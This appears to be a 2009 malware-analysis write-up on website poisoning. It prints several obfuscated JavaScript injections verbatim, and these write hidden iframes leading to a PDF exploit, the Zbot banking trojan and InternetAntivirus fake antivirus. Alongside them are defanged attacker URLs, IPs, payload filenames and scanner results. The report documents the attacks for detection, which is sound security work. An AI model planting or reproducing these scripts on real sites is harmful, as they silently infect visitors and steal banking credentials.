Compromised websites spread InternetAntivirus: January - February, 2009

Web Poisoning: Iframe injection + PDF Exploit / Trojan-Spy.Win32.Zbot + InternetAntivirus

Malicious code inserted:
	<!-- ad --> <script> osoem=(4e0,190); johbc=(9e0,1909); arnrb=(65.,""+"a"+"m"+"e"); vpkgs=(0x826," "); oymzl=(1.89e2<=656?"":5.); oozuk=(0x44>6?"17":2.934e3); aivuk=(4e0,""+"."); rjreh=(5.4e1>0.3?"":.5); mnswd=(414>6.17e3?70.:"9"); zlits=(5.5e1>1.5e1?".":46.); wlpwa=(9,"93"); dmdcw=(1e1<.6495?278.:"las"); bthvu=(0.900,"r"); xwjcg=(0x4,"yl"); wxvoe=(0.64<=0.1?.9:""+"i"+"s"+""); wafzv=(646>8.39e2?9518:"i"); jfazq=(0x685>=8e1?""+"b"+"i"+"l"+"":4.3e1); ernzk=(.840>=2.?53.:"i"+"t"+"y"+""); yfnul=(8.51e2,":"); skxws=(.448,""); vyrje=(0x6,"<"); kylrc=(59,"/i"); zllcn=(8483,""+"a"+""); oxynx=(9.6e1,""+"m"+"e"+""); elbis=(0x66<2002?"r":0x547); slnat=(7.07e2,""); onlvz=(9e0<0x54?"='":58); bljji=(6.,"ht"); oowax=(9.3e1<=4?835.:"tp"); vafut=(93>634.?6157.:":/"); hswsd=(.3>=6.?33.:""); bwtwu=(0.9,"o"); efesv=(0.8,"/"); nczim=(8166>=3.495e3?"=":0.7); kkkka=(0x93,"2"); btqpy=(.6," "); yxjvl=(9.,""+""); myfsk=(7,""); qcevo=(0x2<.350?.4:"h"); lmiph=(.1055>=0.92?0.8:"i"); fgjfd=(329,"d"); onjpi=(9.84e2<=854.?0.7687:"e"); ypdfc=(0.65<=42.?" "+"":.8318); claug=(0x3590,">"); lpcpn=(7.7e1,""); nhbvb=(2,""+">"); flrft=(0x9,5); irhwk=((93<=9893?.711:3)<=(0.9>=9.4e1?.569:3.692e3) ?(.3<=1.2e1?osoem:2.21e2): (4.>.3?.6:0.31)); fyatw=((973.,0.5e1)<(3928.,.7689)?(5<=.532?.696:2e0): (5e0,johbc)); nwyro=((7e0>=8.?3869.:0x2),(5.91e2>=0.957e3?0x2110: arnrb)+(0.5e1,vpkgs)+ (.830>=9.8e1?.533:oymzl)); xwuua=((7e0>=82.?.9357:7.),(1983.>=20.?"85"+"."+"": 8352)+(6.35e2<0x2?0x83:oozuk)+ (1.2e1>0x4843?56:aivuk)); kzxos=((.3727,5.06e2),(.727,rjreh)+(91,"1"+"3")+(6849., mnswd)+(15.,zlits)+(4>.336?""+"1"+"":.2)+ (0.68,wlpwa)+(.79,"/")+(.136,dmdcw)+(0x4<.5?.4:"the") +(6,bthvu)+(2.,"")); kxotj=((3.08e2,0.7310),(0x2,xwjcg)+(7e0<=7.269e3?"e =":5.106e3)+(2.,""+"'"+"v"+"")+ (0x4<6e0?wxvoe:0x7616)+ (.9511<=0x5251?wafzv:0.1902)+(2.807e3>2.1e1?jfazq: 0x2)+(5588.>=2.?ernzk:8.11e2)+ (781>=0.2435?yfnul:67)+ (.82,skxws)); xynhe=((.58,1.266e3),(33>0x32?0x4312:vyrje)+(.6084 <=957?kylrc:0x2769)+(0.63,"fr")+ (2e0,zllcn)+(6.,oxynx)+(426,"")); aaa=(((61>=0.7?4870:178)>=(3.78e2>=0x5?7.709e3 :6.427e3)?(0x1985,9389):(6e0,.825)),((0.229e3> =69.?4.562e3:3132)<=(66<=0x3?7e0:0x229)?(5217. ,5e0):(376.>7.86e2?6.5e1:document)))[(((.82,0x6) <=(8130,.7246)?(4.7e1<.551?2:0.991):(0x9688>=78 1.?0.31:5.04e2)),((7.1e1>=.1?.29:3.8e2),(382,"w")+ (9865>=.2?elbis:13)+(.152>=0x452?0.363:""+"it"+"") +(5.<=8.1e1?"e":0x35)))]((((.6209,6193.), (1.2e1>=9?irhwk:2.89e2))<((.70,.768)>(5.>=.8447? 0x27:681.)?(9870,96.):(454,fyatw))?((0x5<7852? .16:0.4)<=(1e0>1.173e3?0x9967:.3)?(0.3,"<ifr"):(.81 2<27.?58:1e0))+((53.<=29.?1194.:0x9563),(0x961, nwyro))+((1631>88?0x578:7e1)>=(79>=.44?0x107: 6.07e2)?(.6,slnat)+(5.94e2,""+"s"+"")+(7.21e3>5e0? ""+"r"+"c"+"":0.509e3)+(84.<=185.?onlvz:193)+(.2 02,bljji)+(5.6e2<3365.?oowax:1.8e1)+(338.<738.?v afut:0.5e1)+(0.1e1>=.21?"/":9e0)+(4.5e3>=1?hswsd :.573):(.3<.272?60.:0.1))+((0x6,7.5e1),(986.<=36.? 6.3e1:xwuua))+((256>=57.?.89:8e0),(13.>0x76 43?216.:kzxos))+((0.183>1?.20:.5705)<=(27>=3e 0?.909:39)?(6506.,"")+(.794>=0.2?bwtwu:0x66)+(.3 9,"1")+(3.03e3,efesv)+(7.2e1>=0x79?0.202:"?")+(0x 83,"t")+(0.3e1,nczim)+(1538.<=228.?0.9e1:kkkka)+ (0.768>374.?348.:"'")+(1606.,btqpy)+(7.212e3,"s") +(0x8619,"t")+(3.>0x2864?8957:yxjvl):(.756>1221. ?932:6.672e3))+((653.,8.07e2)>=(.95<2.4e1?4e0: 554)?(0x6291,kxotj):(4.9e1,9.))+((263<6.423e3?53.: 8.24e2),(4>=0.13?myfsk:.6)+(238<0.6?0x37:qcevo)+ (.984>=0x2261?2.052e3:lmiph)+(.94,"d")+(7.845e3 >=5?fgjfd:.294)+(4e0,onjpi)+(4872.,"n")+(0.3754>. 4?533:"'"+"")+(0.794e3>9487.?4.8e1:ypdfc)+(5374 .,claug)+(5.9e1,lpcpn))+((0.90,408.),(0x2<=5.041e3 ?xynhe:0x3))+((2.<1.328e3?377.:8e0)<(2.58e2,1e0 )?(0x826<.4?0x436:.1):(4.2e1<8?0.88e2:nhbvb)):(( 5901>=.8159?flrft:9e0),(.4,8.933e3)))); </script><!-- /ad -->
Result:
	<iframe src='hxxp://85.17.139.[BLOCKED]193/lasthero1/?t=2' style='visibility:hidden' ></iframe>
Detected on:
	February 12 by http://www.malwaredomainlist.com/mdl.php?sort=Date......
	February 12 by http://forum.malekal.com/viewtopic.php?f=62&t=17311
Virustotal Analysis on 2009.02.12 09:55:10 (CET):
	2/39 (5.13%)
	Ikarus T3.1.1.45.0 2009.02.12 Exploit.Win32.Pdfjsc
	a-squared 4.0.0.93 2009.02.12 Exploit.Win32.Pdfjsc!IK
Virustotal Analysis on 2009.02.12 09:59:40 (CET):
	Avast 4.8.1335.0 2009.02.11 Win32:Fabot
	eSafe 7.0.17.0 2009.02.11 Suspicious File
	Data 19 2009.02.12 Win32:Fabot
	Symantec 10 2009.02.12 Suspicious.MH690.A
	TrendMicro 8.700.0.1004 2009.02.12 PAK_Generic.001
	http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99

Other Malicious code inserted:
	<!-- ad --><script> uyimh=687; qxcxg=4804; ddytx=7948; xkjpv="write"; mzsrv="me"; zqfqw="et"; gdtrk="/' st"; rpiia="yl"; qxaol=""; ldlvw="i"; zfhuu="ty"; hvkhb=":h"; hbqmm="d"; hauzn=""; zdqdp=4; sjgbi="if"; rpygo="r"; syjnh=" sr"; rwanv="c"; elujl="="; hrgnc=863; akzpp=8853; tplxn=" "; cvtot="</"; qtndm=""; jlooz=3953; uyimh=687; qxcxg=4804; ddytx=7948; xkjpv="write"; mzsrv="me"; zqfqw="et"; gdtrk="/' st"; rpiia="yl"; qxaol=""; ldlvw="i"; zfhuu="ty"; hvkhb=":h"; hbqmm="d"; hauzn=""; zdqdp=4; sjgbi="if"; rpygo="r"; syjnh=" sr"; rwanv="c"; elujl="="; hrgnc=863; akzpp=8853; tplxn=" "; cvtot="</"; qtndm=""; jlooz=3953; gftzo=(9.007e3>=5e1?uyimh:qxcxg); jjaqh=(ddytx>.2438?xkjpv:3.); gmbpt=(7.3e1>=36?mzsrv:.45); zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib"); hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn); rmtyf=(6.5e1,""); aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0. 8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+ sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"") +(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e 3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>" :64.)+(223.>=jlooz?1.:rmtyf)));</script><!-- /ad -->
Result:
	IFRAME is inserted into compromised webpages
	<iframe src='hxxp://truittbros.net/' style='visibility:hidden' > </iframe> <iframe src='hxxp://idealadvertising.org/clicksagent/?...' style='visibility:hidden' > </iframe> idealadvertising.org has been created February 5, 2009 (Registrar: Joker.com) Same suspicious ip 85.17.189.183 (hosted by LEASEWEB - Netherland)
Payload detected by using the IP:
	85.17.189.183/clicksagent/?h=17h 200 Found
Result:
	MS-DOS executable PE for MS Windows
Virustotal Analysis:
	File install.exe received on 02.19.2009 00:14:46 (CET) Result: 7/39 (17.95%)
	http://www.virustotal.com/analisis/33723c307ee9548f4150a30a0679a62b
	File Size: 47,104 bytes
ThreatExpert Analysis:
	http://www.threatexpert.com/report.aspx?md5=dadb6a147a831902e20 62666e045a418 http://www.threatexpert.com/threats/trojan-win32-internetantivirus.html
Alias:
	Trojan.Win32.InternetAntivirus [Ikarus]

Malicious code inserted:
	<!-- ad --> <script language="JavaScript"> function rkfg(jflq){ return String.fromCharCode(jflq); } var ohhe="060105102114097109101032115114099061039104116116112058 04704711511711210111410511111409710012204610511010211104711111 21051150470631160610490510390321191051001161040610390480390321 04101105103104116061039048039032115116121108101061039118105115 10509810510810511612105803210410510010010111005903906206004710 5102114097109101062"; var ifdm=""; for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ ifdm+=rkfg(ohhe.substr (qhxk, 3)); } window.status='Done'; document.write(ifdm); </script> <!-- /ad -->
	* random letter
Same malicious code inserted:
	<script language="JavaScript"> function pwby(yyiu){ return String.fromCharCode(yyiu); } var trsl="060105102114097109101032115114099061039104116116112058 04704711511711210111410511111409710012204610511010211104711111 21051150470631160610490500390321191051001161040610390480390321 04101105103104116061039048039032115116121108101061039118105115 10509810510810511612105803210410510010010111005903906206004710 5102114097109101062"; var mpsq=""; for(hwrv=0;hwrv<trsl.length;hwrv+=3){ mpsq+=pwby(trsl.substr (hwrv, 3)); } window.status='Done'; document.write(mpsq); </script>
Result:
	<iframe src='hxxp://superioradz.info/opis/?t=13' width='0' height='0' style='visibility: hidden;'> </iframe>
Analysis:
	http://www.threatexpert.com/report.aspx?md5=95c04992bf14769fbd1b7b0ada9b9e87
HTTP Requests:
	hxxp://85.17.189.183/opis/?6e53cb91d272691ff1f03316b4e40fe897304252d0b05b1 c33d58155a3825e960ee3a527ad0f3b81a23df2c7d43150e96be9dca7a6e59d3f4d816 ff4a5122e8f
	hxxp://85.17.189.183/opis/?8fbe2b5fa4842f6f0fe51f024732e6b290ef4e487d3779dc2 d10d646083af5315a0c295b173c9074618dc04b42ade64ca0abd171ed2dcd203721fc9 bdd89aba3
	text/html (JavaScript)
Javascript Analysis:
	http://wepawet.iseclab.org/view.php?hash=ca172b3a2297a76af1183181cba4249a&t =1234983863&type=js
Virustotal Analysis: VT: 1/39 (2.71%)
	http://www.virustotal.com/analisis/df3279de33cdf24699004ab05ef61d13
Alias:
	JS/Xilos [Microsoft]
HTTP Requests:
	hxxp://85.17.189.183/opis/?35c0378e5af230cb06d1aef60e9d313999fb02e0230541 0fd4357d45f884bd55584e963ddeeb3e2010d55b1bc73920171042005b87c96f99cb 9b3820d28f4413
	application/x-shockwave-flash (swf - Shockwave Flash File)
Result:
	MS-DOS executable PE for MS Windows downloaded
	hxxp://85.17.189.183/opis/?h=17
	File name: a.exe File Size: 8704 Bytes
ThreatExpert Analysis:
:	http://www.threatexpert.com/report.aspx?md5=8d82c411cb3748dfefcbd4277db7fbfd
Virustotal Analysis:
	File a.exe received on 02.18.2009 14:11:35 (CET) Result: 5/39 (12.82%) http://www.virustotal.com/analisis/a1bee09c6dd5cf3dbd890a4b777156b2
	File a.exe received on 02.19.2009 00:14:46 (CET) Result: 7/39 (17.95%) http://www.virustotal.com/analisis/4e0e89411f8cfb49482553319d080e38
Alias:
	Suspicious.MH690 [Symantec]
	TrojanDownloader:Win32/Obitel.gen!A [Microsoft]
	http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99
Analysis: First infection:
HTTP Requests:
	85.17.143.203:80 - [banksguard.com]
	GET /pics/ncr.exe
	File name: ncr.exe
	File Size: 61952 Bytes
Alias & packer info:
	Troj/Inject-EF [Sophos]
	Trojan.Win32.Zbot [Ikarus]
	packed with: PE_Patch [Kaspersky Lab]
ThreatExport Analysis:
	http://www.threatexpert.com/report.aspx?md5=5d074816dc6625fcd8df4c8f7dce992b
Iseclab Anubis Analysis:
	Ikarus Virus Scanner - Trojan.Win32.Zbot (Sig-Id:454183)
	http://anubis.iseclab.org/?action=result&task_id=14fd198d4506042d4c901eed512f5f33 8&format=html
Virustotal Analysis:
	File ncr.exe received on 02.18.2009 20:05:49 (CET) Result: 11/39 (28.21%) http://www.virustotal.com/analisis/2bcb0d524cf1e0524997077667c93963
	File ncr.exe received on 02.19.2009 11:55:07 (CET) Result: 14/39 (35.9%) http://www.virustotal.com/analisis/e1721fe1408999bfb71f97e749fa1b17
	mcenspc.dll
	http://www.threatexpert.com/files/mcenspc.dll.html
Analysis: After first infection:
HTTP Activity:
	85.17.143.203:80 - [banksguard.com]
	Request: POST /pics/receiver/online
Anubis Iseclab Analysis:
	http://anubis.iseclab.org/?action=result&task_id=14fd198d4506042d4c901eed512f5 f338&format=html
Detected on:
	February 12 by http://secuboxlabs.fr/
	February 12 by http://www.malwaredomainlist.com/forums/index.php?topic=2550.0
	February 12 by http://forum.malekal.com/viewtopic.php?f=62&t=17311
	February 15 by http://www.malwaredomainlist.com/mdl.php?search=superioradz.info
	The domain superioradz.info has suddenly disapeared (ns lookup failed)and the folder has been deleted/renamed.

Other Malicious code inserted:
	<!-- ad --> <script> qedla=(6.,285); rkkfh=(47>.7?"":.6461); vqsqr=(7628,"r"); eazri=(580>=0x61?"":9.15e2); lfhmf=(4.43e2,"de"); fxzlv=(0x62,""+"l"+"a"+"d"+""); jhcfl=(172.,"si"); osdjh=(.7,""+"n"+""); riwhq=(.90,""+""); urrox=(1.1e1,""); lpzjx=(502.<0x32?58:"e>"); mqbwp=(.87,1185); mwpwc=(366>.225?"":0x223); vwlum=(.5991,"<"); kviru=(.4>=6?0x518:"s"); zqfbo=(66.,"r"); lwsau=(1,"t"); xqwee=(8.39e2>0x4149?536.:""+""); mwztz=(3,""+"c"+"k"+""); bonre=(89.<=.5773?.7:""+"a"+""); qzdhg=(3.3e1<=6?4586:"g"); pjrjp=(388,"e"); wueyt=(0x75>0.6?"/":0x6); yxmzd=(857,""+"t"+""); sbkom=(2.96e2,"="); bmwzz=(2.2e1,"2"); mvlil=(0.2>=0.919e3?.875:""+"'"+""); hibed=(.7882<0x80?"yl":0x8300); jspxp=(4.124e3,""+"e"+"="+""); tkrie=(7,""+"'"+"v"+""); wzpci=(61.<0x807?"s"+"i":1e0); epeqe=(5.915e3,"bi"); nlydk=(5.821e3<=0x6?5e0:"t"); lodri=(8e0,":"); gsbcm=(6.8e2<=34.?0x4652:""); yljdx=(.8,"idd"); ralhl=(1e0,"n' >"); dwiyy=(9990,"<"); fxuin=(0x91<=710.?"m":8e0); cqgjk=(6e1,6); xddte=((6.76e2,0.165)>=(0x4<81.?38.:6)?(1e0>614?1e0:0.5110):(9e0,qedla)); plwqh=((7>=.2310?.3:141.)<=(0x3713,.92)?(7666.,rkkfh)+(0.9,vqsqr)+(0.457 <.3?2:eazri):(.4<9?3.:979));tpghb=((0.8789>=4.?1e0:48.)<=(1121,40.)?(95. <=0x88?9.5e1:.6):(46.<=.4?793:""));ajyne=((9.52e2<=0x4?0.6e1:0.994)> (0x5249,0.6)?(6.3e1,"")+(285>=.2850?lfhmf:0x6)+(0x82,""+"a"+"")+(.831,fxzlv) +(77.,"v"+"er")+(10.,"ti")+(5.94e2<=7.4e3?jhcfl:.5)+(6e2,osdjh)+(7.8e1 <0x8?1.64e2:"g.")+(0.9,""+"o"+"r"+"")+(0x5,"g"):(7.1e1<0x15?4e0:0.75e2)); vpxsa=((.63<=.2?0.5:.258),(4e0,riwhq)+(74.,"/"+"cl"+"i")+(2.365e3>=0.5? urrox:6.));abflo=((0.428<=.7314?4.:2288)>(76.,.441)?(0.6,lpzjx):(2.746e3 <3518.?0x5662:0x738)); aaa=(((0x17,4.471e3),(3e0>8?0.93:23.)),((.1<0x738?6407:.87),(35.<= 3804.?document:61)))[(((.2816,0.5)<(9.792e3,73.)?(.85,4e0):(975,0x8))>= ((0.51,0x53),(7.803e3>.9638?0x647:823.))?((2.>=0.8597?9e0:.1),(6.>=3 ?xddte:1.89e2)):((.627>=0.790?83.:mqbwp),(7e0,mwpwc))+((6e0,0.2687) ,(.177,""+"w"+""))+((9.9e2<0.9e1?0x66:1e0)>=(3.404e3>8858?5279.: 0x5666)?(0.702,0x2):(2.<=9654.?plwqh:0x4337))+((3.,0.26e2)<=(5,.48) ?(0x3116,0.9):(3.11e2,"i"))+((0x3584<=656.?0x402:0x6)>=(36,27.)?(.63 ,35.):(49<70.?"t":2.))+((37.>.976?0.8:4e0)>(4398.>=59?4.:0x1)?(628.> 2353.?1.:.6779):(.1618,"e"))+((840>=55.?3.:96)<(.4008,0x5)?(9398.>= 0x99?tpghb:269):(0.77e2,3.817e3)))]((((0.133<=0x402?6e0:.91), (0x7201,213.)),((.419,0.511e3),(6.361e3,vwlum)+(.168<=3?"ifra":0x8) +(3e0,"m")+(9.74e2>=6.643e3?7.7e1:"e ")+(.461>=0x465?1:kviru) +(.7282,zqfbo))+((.4108,0x414)>(0.6148>=.50?0.834:98)?(0x87>= 0x4716?27.:""+"c"+"="+"'"+"h"+"t"+""):(9<40?0x27:.66))+((0x10,0x69), (3.534e3>0x8?lwsau:0.6865)+(.5,"p:")+(0x27>=0x5755?7e0:"//i")+(0.6,"")) +((0x8>.3887?.3794:2e0),(2009.,ajyne))+((.37<68.?7.:6.2e1)>(0x7,2698) ?(23.<=9.657e3?4e0:6.51e2):(0x4968,vpxsa))+((4.>.83?0x7:2.73e2)<= (4.729e3<=.2?7e0:0.224)?(4.9e1<.61?0x7:.53):(3.62e2,xqwee)+(2.996e3, mwztz)+(0x82>=0x3?"s":0.4666)+(0x145<1?.775:bonre)+(0.755,qzdhg)+ (0x129>=684?.887:pjrjp)+(0.636<0.4323?4e1:"nt")+(9e0,wueyt)+(0x377> =.5?"?":90.)+(0x424>0x25?yxmzd:0.2562)+(4.3e1,sbkom))+((3706,0x1) ,(0x7863,bmwzz)+(9552<0x1?6.611e3:mvlil)+(.5085>1.86e2?0.102:" s") +(3<62?"t":.2)+(0.90>2.74e2?8e0:hibed)+(.64>=6472?2.335e3:jspxp) +(545.<=565.?tkrie:7.178e3)+(0x528>2977?9.:"i"+"")+(0.3,wzpci) +(5589,epeqe)+(0x333<=74?.768:"l")+(596<=2?6784:""))+((0.9,34.), (70.,"")+(6377>=2.086e3?"i":0x4464)+(.161,nlydk)+(8e1<.510?7446:"y")+ (0x2<=41.?lodri:25.)+(9.,gsbcm))+((0.91>=.5?.67:697.),(97.>1?""+"h"+"":62) +(96.,yljdx)+(7e0<5.47e2?"e":5e0)+(0x52,ralhl)+(0.19>=.580?8:dwiyy)+ (0.037e3>.698?"/"+"if"+"r"+"a":39.)+(9,fxuin))+((0x3397,cqgjk)<= (0.5236<=374.?5e0:0.4)?(8.059e3>8794?4.56e2:4.314e3):(.2562,abflo)))); </script><!-- /ad -->
Result:
	IFRAME is inserted into compromised webpages
	<iframe src='hxxp://idealadvertising.org/clicksagent/?t=2' style='visibility:hidden' ></iframe> <iframe src='hxxp://idealadvertising.org/clicksagent/?...' style='visibility:hidden' > </iframe> idealadvertising.org has been created February 5, 2009 (Registrar: Joker.com) Same suspicious ip 85.17.189.183 (hosted by LEASEWEB - Netherland)
JavaScript Analysis:
	http://wepawet.iseclab.org/view.php?hash=45d3...
JS Obfuscated Code:
	hxxp://idealadvertising.org/clicksagent/?t=2
	hxxp://idealadvertising.org/clicksagent/?075c.....
	hxxp://idealadvertising.org/clicksagent/?6cb.....
Network Activity:
	81.2.253.206:80 - [www.sprinterkiado.hu]
	Request: GET /index.php?session_id=57972&user_id=0&screen=8
	195.70.32.221:80 - [c.hu.tipptop.com]
	Request: GET /cgi-bin/?id=3608&c=LPmcnYzL&h=1
	85.17.189.183:80 - [idealadvertising.org]
	Request: GET /clicksagent/?t=2
Result: MS-DOS executablePE for MS Windows:
	hxxp://85.17.189.183/clicksagent/?h=17h File name: ncr.exe File Size: 8704 Bytes
Iseclab Anubis Analysis:
	http://anubis.iseclab.org/?action=result&task_id=12d602...
VirusTotal Results: 7/39 (17.95%):
	http://www.virustotal.com/analisis/33723c307ee9548f4150a30a0679a62b
	Analysed on 02.19.2009 00:14:46
Alias:
	http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99&tabid=2
	Suspicious.MH690.A [Symantec]